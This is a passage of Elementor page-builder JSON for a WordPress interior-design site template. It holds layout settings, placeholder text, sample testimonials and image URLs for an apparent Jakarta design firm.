IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_p